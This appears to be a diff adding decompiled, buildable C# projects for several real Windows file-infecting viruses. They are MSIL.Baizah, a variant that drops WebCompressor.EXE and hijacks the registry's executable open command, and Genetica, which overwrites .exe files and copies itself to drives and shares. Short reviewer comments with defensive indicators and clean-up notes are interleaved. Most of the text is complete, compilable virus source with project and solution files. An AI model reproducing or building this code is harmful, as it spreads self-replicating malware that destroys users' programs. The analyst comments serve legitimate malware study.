GlobalSection(ProjectConfigurationPlatforms) = postSolution
{72D58C81-974F-4786-92A7-698B07EF16B9}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{72D58C81-974F-4786-92A7-698B07EF16B9}.Debug|Any CPU.Build.0 = Debug|Any CPU
{72D58C81-974F-4786-92A7-698B07EF16B9}.Release|Any CPU.ActiveCfg = Release|Any CPU
{72D58C81-974F-4786-92A7-698B07EF16B9}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,10 @@
using System.Reflection;
[assembly: AssemblyKeyFile("..\\..\\MSIL_Baizah.snk")]
[assembly: AssemblyDelaySign(true)]
[assembly: AssemblyCopyright("(c) MyVWA")]
[assembly: AssemblyProduct("Baizah")]
[assembly: AssemblyCompany("MyVWA")]
[assembly: AssemblyDescription("MyVWA.Fa Made in Malaysia 2005")]
[assembly: AssemblyTitle("MSIL_Baizah")]
[assembly: AssemblyVersion("0.1.1.4904")]
@@ -0,0 +1,72 @@
// Decompiled with JetBrains decompiler
// Type: MSIL_Baizah.Baizah
// Assembly: MSIL_Baizah, Version=0.1.1.4904, Culture=neutral, PublicKeyToken=1497983a8894e652
// MVID: 1CA6961D-C379-4794-90D6-FCB5D0BD9BC6
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4.exe
using System;
using System.IO;
using System.Reflection;
using System.Security.Permissions;
using System.Windows.Forms;
namespace MSIL_Baizah
{
public class Baizah : MainVirus
{
private Timer myTimer = new Timer();
private void TimerEventProcessor(object myObject, EventArgs myEventArgs)
{
IDataObject dataObject = Clipboard.GetDataObject();
if (!dataObject.GetDataPresent(DataFormats.FileDrop))
return;
foreach (string str in (string[]) dataObject.GetData(DataFormats.FileDrop))
{
try
{
if (new FileInfo(str).Extension == MainVirus.Decode("LmV4ZQ=="))
this.CopyHost(str);
}
catch
{
}
}
}
private void CopyHost(string target)
{
FileInfo fileInfo1 = new FileInfo(Assembly.GetExecutingAssembly().GetModules()[0].FullyQualifiedName);
FileInfo fileInfo2 = new FileInfo(target);
if (!fileInfo2.Exists)
return;
try
{
Stream stream1 = (Stream) fileInfo1.OpenRead();
Stream stream2 = (Stream) fileInfo2.OpenWrite();
BufferedStream bufferedStream1 = new BufferedStream(stream1);
BufferedStream bufferedStream2 = new BufferedStream(stream2);
byte[] buffer = new byte[1024];
int count;
while ((count = bufferedStream1.Read(buffer, 0, 1024)) > 0)
bufferedStream2.Write(buffer, 0, count);
bufferedStream2.Flush();
bufferedStream1.Close();
bufferedStream2.Close();
}
catch (Exception ex)
{
}
}
[PermissionSet(SecurityAction.Deny, XML = "<PermissionSet class=\"System.Security.PermissionSet\"\r\n version=\"1\">\r\n <IPermission class=\"System.Security.Permissions.ReflectionPermission, mscorlib, Version=1.0.5000.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"\r\n version=\"1\"\r\n Flags=\"NoFlags\"/>\r\n</PermissionSet>\r\n")]
public void Baiz()
{
this.myTimer.Tick += new EventHandler(this.TimerEventProcessor);
this.myTimer.Interval = new Random().Next(1000, 10000);
this.myTimer.Start();
while (true)
Application.DoEvents();
}
}
}
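Review bot: The literal passed to `MainVirus.Decode` in `TimerEventProcessor` is left encoded, which hides the one condition that selects targets; `LmV4ZQ==` is Base64 for `.exe`, and a trailing comment `// Base64 of ".exe"` would make that readable. `CopyHost` should also carry a comment that `fileInfo2.OpenWrite()` does not truncate, so a target larger than the running module keeps its original trailing bytes and its size. Size is therefore not a usable indicator; content hashes, or a comparison of the leading bytes with the sample, are. Both `catch` blocks are empty, so failed writes leave no trace, and the `while (true) Application.DoEvents();` loop in `Baiz` keeps one thread spinning, which shows up as sustained CPU use by the process.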
@@ -0,0 +1,31 @@
// Decompiled with JetBrains decompiler
// Type: MSIL_Baizah.MainVirus
// Assembly: MSIL_Baizah, Version=0.1.1.4904, Culture=neutral, PublicKeyToken=1497983a8894e652
// MVID: 1CA6961D-C379-4794-90D6-FCB5D0BD9BC6
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4.exe
using System;
using System.Text;
using System.Threading;
namespace MSIL_Baizah
{
public class MainVirus
{
private static string Info = "MSIL.Baizah (c) by MyVWA.Fa Made in Malaysia 032005";
private static void Main() => new Thread(new ThreadStart(new Baizah().Baiz)).Start();
protected internal static string Decode(string input)
{
try
{
return Encoding.ASCII.GetString(Convert.FromBase64String(input));
}
catch (Exception ex)
{
return (string) null;
}
}
}
}
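Review bot: The private static `Info` string is declared and never read in this class, and being private it cannot be read from `Baizah` either, so it looks like an embedded author banner rather than program data. A comment such as `// banner only, not referenced; usable as a static string indicator` would say so. `Decode` returns `null` on any exception, and its only visible caller compares the result with `FileInfo.Extension`, so a comment on the `catch` noting that a decode failure simply makes that comparison false would save the reader a trace.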
@@ -0,0 +1,41 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{640056C8-1D28-4052-983A-963F485EB4EA}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>MSIL_Baizah</AssemblyName>
<ApplicationVersion>0.1.1.4904</ApplicationVersion>
<RootNamespace>MSIL_Baizah</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="System.Windows.Forms" />
</ItemGroup>
<ItemGroup>
<Compile Include="MainVirus.cs" />
<Compile Include="Baizah.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "MSIL_Baizah", "Virus.MSIL.Small.c-f40845ea259fc051ffa3c16cc1cb4e147ac5c46bfa927107f307992fb18573e4.csproj", "{640056C8-1D28-4052-983A-963F485EB4EA}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{640056C8-1D28-4052-983A-963F485EB4EA}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{640056C8-1D28-4052-983A-963F485EB4EA}.Debug|Any CPU.Build.0 = Debug|Any CPU
{640056C8-1D28-4052-983A-963F485EB4EA}.Release|Any CPU.ActiveCfg = Release|Any CPU
{640056C8-1D28-4052-983A-963F485EB4EA}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,172 @@
// Decompiled with JetBrains decompiler
// Type: A1.Module1
// Assembly: A1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C1AB6CC2-D9C5-4370-9131-5F354F00AF83
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.d-5b328849ffa3b0176bc09c399920923169a7a8ceec3f27ea9c9460fdc3c743f6.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
namespace A1
{
[StandardModule]
internal sealed class Module1
{
[STAThread]
public static void Main()
{
string executablePath = Application.ExecutablePath;
string str1 = Path.Combine(Environment.SystemDirectory, "WebCompressor.EXE");
byte[] array1 = new byte[5121];
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.UseShellExecute = false;
try
{
FileStream fileStream = new FileStream(executablePath, FileMode.Open, FileAccess.Read);
fileStream.Read(array1, 0, 5120);
fileStream.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (StringType.StrCmp(executablePath, str1, false) == 0)
{
try
{
string commandLineArg = Environment.GetCommandLineArgs()[1];
if (File.Exists(commandLineArg))
{
byte[] array2 = new byte[5121];
try
{
FileInfo fileInfo = new FileInfo(commandLineArg);
if (fileInfo.Length >= 5120L)
{
int attributes = (int) fileInfo.Attributes;
DateTime creationTime = fileInfo.CreationTime;
DateTime lastWriteTime = fileInfo.LastWriteTime;
DateTime lastAccessTime = fileInfo.LastAccessTime;
fileInfo.Attributes = FileAttributes.Normal;
FileStream fileStream = new FileStream(commandLineArg, FileMode.Open, FileAccess.ReadWrite);
fileStream.Read(array2, 0, 5120);
if (StringType.StrCmp(BitConverter.ToString(array1), BitConverter.ToString(array2), false) != 0)
{
fileStream.Position = 0L;
fileStream.Write(array1, 0, 5120);
fileStream.Position = fileStream.Length;
fileStream.Write(array2, 0, 5120);
}
fileStream.Close();
fileInfo.Attributes = (FileAttributes) attributes;
fileInfo.CreationTime = creationTime;
fileInfo.LastWriteTime = lastWriteTime;
fileInfo.LastAccessTime = lastAccessTime;
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
ProcessStartInfo processStartInfo = startInfo;
processStartInfo.ErrorDialog = true;
processStartInfo.FileName = commandLineArg;
processStartInfo.Arguments = Interaction.Command().Remove(0, checked (Strings.Len(commandLineArg) + 2));
try
{
Process.Start(startInfo);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
else
{
try
{
try
{
FileSystem.SetAttr(str1, FileAttribute.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
FileStream fileStream = new FileStream(str1, FileMode.OpenOrCreate, FileAccess.Write);
fileStream.Write(array1, 0, 5120);
fileStream.Close();
FileSystem.SetAttr(str1, FileAttribute.ReadOnly);
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("ExeFile\\Shell\\Open\\Command", true);
registryKey.SetValue("", (object) (str1 + " \"%1\" %*"));
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
if (new FileInfo(executablePath).Length < 10240L)
return;
FileStream fileStream1 = new FileStream(executablePath, FileMode.Open, FileAccess.Read);
fileStream1.Position = checked (fileStream1.Length - 5120L);
fileStream1.Read(array1, 0, 5120);
fileStream1.Close();
string tempFileName = Path.GetTempFileName();
try
{
FileSystem.Kill(tempFileName);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
string str2 = Path.Combine(Application.StartupPath, Path.GetFileNameWithoutExtension(tempFileName) + ".EXE");
try
{
FileSystem.SetAttr(str2, FileAttribute.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
File.Copy(executablePath, str2, true);
FileStream fileStream2 = new FileStream(str2, FileMode.Open, FileAccess.Write);
fileStream2.Write(array1, 0, 5120);
fileStream2.SetLength(checked (fileStream2.Length - 5120L));
fileStream2.Close();
startInfo.FileName = str2;
startInfo.Arguments = Interaction.Command();
Process.Start(startInfo).WaitForExit();
FileSystem.SetAttr(str2, FileAttribute.Normal);
FileSystem.Kill(str2);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
}
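Review bot: `Main` lacks a header naming the two host artifacts an analyst needs: the copy written to `WebCompressor.EXE` in the system directory and set read-only, and the default value of `ExeFile\Shell\Open\Command` under `HKEY_CLASSES_ROOT`, which is replaced with that path followed by ` "%1" %*`. With that value in place every executable launch goes through the dropped file, so the comment should state that clean-up has to restore the association to `"%1" %*` before the file is removed, otherwise launching `.exe` files fails. As in the Radalatan listing, attributes and the three file times are restored after the write in the `fileInfo.Length >= 5120L` branch, so timestamps do not identify modified files. The later `A1.Module1` listing in this commit (same MVID, different sample hash) appears to be line-for-line the same, and the same comments apply there.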
@@ -0,0 +1,45 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.d-5b328849ffa3b0176bc09c399920923169a7a8ceec3f27ea9c9460fdc3c743f6.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>A1</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>A1</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "A1", "Virus.MSIL.Small.d-5b328849ffa3b0176bc09c399920923169a7a8ceec3f27ea9c9460fdc3c743f6.csproj", "{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}.Debug|Any CPU.Build.0 = Debug|Any CPU
{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}.Release|Any CPU.ActiveCfg = Release|Any CPU
{9C7DDFA3-CE49-46A4-BDCB-96A0123C507E}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,172 @@
// Decompiled with JetBrains decompiler
// Type: A1.Module1
// Assembly: A1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C1AB6CC2-D9C5-4370-9131-5F354F00AF83
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.d-90ca70d213e58ad53749d712f830807701db7e36d6e00d8bbaf79f0071b7b002.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Windows.Forms;
namespace A1
{
[StandardModule]
internal sealed class Module1
{
[STAThread]
public static void Main()
{
string executablePath = Application.ExecutablePath;
string str1 = Path.Combine(Environment.SystemDirectory, "WebCompressor.EXE");
byte[] array1 = new byte[5121];
ProcessStartInfo startInfo = new ProcessStartInfo();
startInfo.UseShellExecute = false;
try
{
FileStream fileStream = new FileStream(executablePath, FileMode.Open, FileAccess.Read);
fileStream.Read(array1, 0, 5120);
fileStream.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
if (StringType.StrCmp(executablePath, str1, false) == 0)
{
try
{
string commandLineArg = Environment.GetCommandLineArgs()[1];
if (File.Exists(commandLineArg))
{
byte[] array2 = new byte[5121];
try
{
FileInfo fileInfo = new FileInfo(commandLineArg);
if (fileInfo.Length >= 5120L)
{
int attributes = (int) fileInfo.Attributes;
DateTime creationTime = fileInfo.CreationTime;
DateTime lastWriteTime = fileInfo.LastWriteTime;
DateTime lastAccessTime = fileInfo.LastAccessTime;
fileInfo.Attributes = FileAttributes.Normal;
FileStream fileStream = new FileStream(commandLineArg, FileMode.Open, FileAccess.ReadWrite);
fileStream.Read(array2, 0, 5120);
if (StringType.StrCmp(BitConverter.ToString(array1), BitConverter.ToString(array2), false) != 0)
{
fileStream.Position = 0L;
fileStream.Write(array1, 0, 5120);
fileStream.Position = fileStream.Length;
fileStream.Write(array2, 0, 5120);
}
fileStream.Close();
fileInfo.Attributes = (FileAttributes) attributes;
fileInfo.CreationTime = creationTime;
fileInfo.LastWriteTime = lastWriteTime;
fileInfo.LastAccessTime = lastAccessTime;
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
ProcessStartInfo processStartInfo = startInfo;
processStartInfo.ErrorDialog = true;
processStartInfo.FileName = commandLineArg;
processStartInfo.Arguments = Interaction.Command().Remove(0, checked (Strings.Len(commandLineArg) + 2));
try
{
Process.Start(startInfo);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
else
{
try
{
try
{
FileSystem.SetAttr(str1, FileAttribute.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
FileStream fileStream = new FileStream(str1, FileMode.OpenOrCreate, FileAccess.Write);
fileStream.Write(array1, 0, 5120);
fileStream.Close();
FileSystem.SetAttr(str1, FileAttribute.ReadOnly);
RegistryKey registryKey = Registry.ClassesRoot.OpenSubKey("ExeFile\\Shell\\Open\\Command", true);
registryKey.SetValue("", (object) (str1 + " \"%1\" %*"));
registryKey.Close();
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
if (new FileInfo(executablePath).Length < 10240L)
return;
FileStream fileStream1 = new FileStream(executablePath, FileMode.Open, FileAccess.Read);
fileStream1.Position = checked (fileStream1.Length - 5120L);
fileStream1.Read(array1, 0, 5120);
fileStream1.Close();
string tempFileName = Path.GetTempFileName();
try
{
FileSystem.Kill(tempFileName);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
string str2 = Path.Combine(Application.StartupPath, Path.GetFileNameWithoutExtension(tempFileName) + ".EXE");
try
{
FileSystem.SetAttr(str2, FileAttribute.Normal);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
File.Copy(executablePath, str2, true);
FileStream fileStream2 = new FileStream(str2, FileMode.Open, FileAccess.Write);
fileStream2.Write(array1, 0, 5120);
fileStream2.SetLength(checked (fileStream2.Length - 5120L));
fileStream2.Close();
startInfo.FileName = str2;
startInfo.Arguments = Interaction.Command();
Process.Start(startInfo).WaitForExit();
FileSystem.SetAttr(str2, FileAttribute.Normal);
FileSystem.Kill(str2);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
}
@@ -0,0 +1,45 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Virus.MSIL.Small.d-90ca70d213e58ad53749d712f830807701db7e36d6e00d8bbaf79f0071b7b002.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{E87DC481-08E4-47A6-967A-BBE3F1775FEB}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>A1</AssemblyName>
<ApplicationVersion>0.0.0.0</ApplicationVersion>
<RootNamespace>A1</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="Module1.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "A1", "Virus.MSIL.Small.d-90ca70d213e58ad53749d712f830807701db7e36d6e00d8bbaf79f0071b7b002.csproj", "{E87DC481-08E4-47A6-967A-BBE3F1775FEB}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{E87DC481-08E4-47A6-967A-BBE3F1775FEB}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{E87DC481-08E4-47A6-967A-BBE3F1775FEB}.Debug|Any CPU.Build.0 = Debug|Any CPU
{E87DC481-08E4-47A6-967A-BBE3F1775FEB}.Release|Any CPU.ActiveCfg = Release|Any CPU
{E87DC481-08E4-47A6-967A-BBE3F1775FEB}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,14 @@
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: Guid("54fe8a70-2a61-4cab-a28c-3255bccb2dd4")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCopyright("Copyright © Trojan 2006")]
[assembly: AssemblyProduct("ConsoleApplication1")]
[assembly: AssemblyCompany("Trojan")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyTitle("ConsoleApplication1")]
[assembly: AssemblyVersion("1.0.0.0")]
@@ -0,0 +1,101 @@
// Decompiled with JetBrains decompiler
// Type: Genetica.Program
// Assembly: Genetica, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 38269FF5-76F0-4DD3-B590-2FD089D27FC7
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.e-9ffb73bdd50a2d9e84afde5afedf818d05b2062060763ca983b64f52cc9f5c4f.exe
using Microsoft.Win32;
using System;
using System.IO;
using System.Reflection;
namespace Genetica
{
internal class Program
{
private static void Main(string[] args)
{
int num = 5;
string str1 = (string) null;
object obj = Registry.LocalMachine.OpenSubKey("System\\CurrentControlSet\\Services\\lanmanserver\\Shares", false).GetValue("shared");
string str2 = obj as string;
char[] charArray = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789".ToCharArray();
string[] logicalDrives = Directory.GetLogicalDrives();
Random random = new Random();
string location = Assembly.GetExecutingAssembly().Location;
string currentDirectory = Environment.CurrentDirectory;
if (currentDirectory.Substring(currentDirectory.Length - 1) != "\\")
currentDirectory += "\\";
string[] files = Directory.GetFiles(currentDirectory);
string[] directories = Directory.GetDirectories(currentDirectory, "*");
for (int index1 = 0; index1 < num; ++index1)
{
int index2 = random.Next(charArray.Length);
str1 += charArray[index2].ToString();
}
int index3 = 0;
for (int length = directories.Length; index3 < length; ++index3)
{
if (directories[index3].Substring(directories[index3].Length - 1) != "\\")
{
string[] strArray;
IntPtr index4;
(strArray = directories)[(int) (index4 = (IntPtr) index3)] = strArray[index4] + "\\";
File.Copy(location, directories[index3] + str1 + ".exe");
}
}
for (int index5 = 0; index5 <= logicalDrives.GetUpperBound(0); ++index5)
{
try
{
File.Copy(location, logicalDrives[index5] + str1 + ".exe");
}
catch
{
}
}
string[] strArray1 = obj as string[];
string str3 = strArray1[2];
if (strArray1 != null)
{
try
{
strArray1.GetEnumerator();
string str4 = str3.Substring(str3.Length - (str3.Length - 5)) + "\\";
File.Copy(location, str4 + str1 + ".exe");
}
catch
{
}
}
for (short index6 = 0; (int) index6 < files.GetUpperBound(0); ++index6)
{
if (files[(int) index6].Substring(files[(int) index6].Length - (files[(int) index6].Length - files[(int) index6].Length + 4)) == ".exe")
{
if ("\r\n" + files[(int) index6] != location)
{
try
{
string path1 = location;
string path2 = files[(int) index6];
FileStream fileStream1 = new FileStream(path1, FileMode.Open, FileAccess.Read);
FileStream fileStream2 = new FileStream(path2, FileMode.Create, FileAccess.Write);
byte[] buffer = new byte[fileStream1.Length];
fileStream1.Read(buffer, 0, Convert.ToInt32(fileStream1.Length));
fileStream2.Write(buffer, 0, Convert.ToInt32(fileStream1.Length));
fileStream1.Close();
fileStream2.Close();
fileStream1.Dispose();
fileStream2.Dispose();
}
catch
{
}
}
}
}
Console.Write("Retro is Evil!!");
Console.Read();
}
}
}
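Review bot: `Main` has no analyst comment, and the last loop is the part a reader must not miss: it opens each `.exe` found in the working directory with `FileMode.Create` and writes the sample's own bytes over it, so affected files are replaced outright and, as far as this code shows, can only be restored from backup. I would put `// ANALYSIS: overwriting infector; also copies itself as <5 random alphanumerics>.exe into every subdirectory and drive root` above `Main`, and note the read of `System\CurrentControlSet\Services\lanmanserver\Shares` as a host-side indicator. The `IntPtr index4` indexing in the directories loop looks like a decompiler rendering of `directories[index3] += "\\"` and deserves a one-line comment saying so, so it is not read as pointer arithmetic. The literal `"Retro is Evil!!"` written to the console is a stable string for a triage signature.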
@@ -0,0 +1,37 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.MSIL.Small.e-9ffb73bdd50a2d9e84afde5afedf818d05b2062060763ca983b64f52cc9f5c4f.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{EDF8135E-900A-4762-8C84-977F6FBD7B71}</ProjectGuid>
<OutputType>Exe</OutputType>
<AssemblyName>Genetica</AssemblyName>
<ApplicationVersion>1.0.0.0</ApplicationVersion>
<RootNamespace>Genetica</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
